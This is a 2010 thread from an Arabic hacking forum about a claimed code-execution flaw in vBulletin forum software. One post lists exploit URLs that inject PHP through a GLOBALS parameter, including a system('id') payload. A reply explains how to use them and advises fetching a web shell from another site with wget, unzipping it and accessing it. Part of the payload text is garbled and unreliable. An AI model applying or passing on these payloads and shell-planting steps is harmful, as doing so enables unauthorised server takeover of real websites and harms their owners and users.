التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
تحديث الصفحة الحققققق ثغرة جديده بمنتديات vb
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-19-2010, 01:59 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية GuEvArA511
 

 
 
إحصائية العضو





GuEvArA511 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
GuEvArA511 is on a distinguished road
افتراضي

مشكور ثغرة من جد طازة

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي

كود PHP:
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart 


   

رد مع اقتباس
قديم 08-19-2010, 07:25 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية dz-fox
 

 
 
إحصائية العضو






dz-fox غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dz-fox is on a distinguished road
افتراضي

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة GuEvArA511
مشكور ثغرة من جد طازة

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي
كود PHP:
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart 

عزيزي هذه تغرة Code Execution يعني تقدر تطبق أوامر التي تستعملها في الشل في رابط الموقع مباشرة

يعني مثلا http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

بهذا سيظهر لك في الموقع صلاحياتك على السيرفر لأننا ادرجنا الأمر id

افضل الطرق انك تسحب شل من موقع آخر برابط مباشر بصيغة zip (مضغوط) بالأمر wget

و تفك الضغط الضغط بالأمر unzip و تدخل على الشل و smilies12

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة جديده من هكر عرعر ViRuS Qalaa قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 7 07-22-2010 05:40 PM
[ خبـر ] : ثغرة جديده في هاك vBulletin Radio and TV Player xman2 قســم تطويــر المــــواقع 0 06-24-2009 04:30 PM
[Template] : postbit_legacy الخاص بمنتديات عالم الحب اروع ما يكون للنسخ 3.8 فما فوق xman2 قســم تطويــر المــــواقع 0 06-03-2009 07:31 PM
[Template] : قالب postbit_legacy الخاص بمنتديات دردشه لجميع النسخ xman2 قســم تطويــر المــــواقع 0 05-01-2009 09:02 PM


الساعة الآن 09:19 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0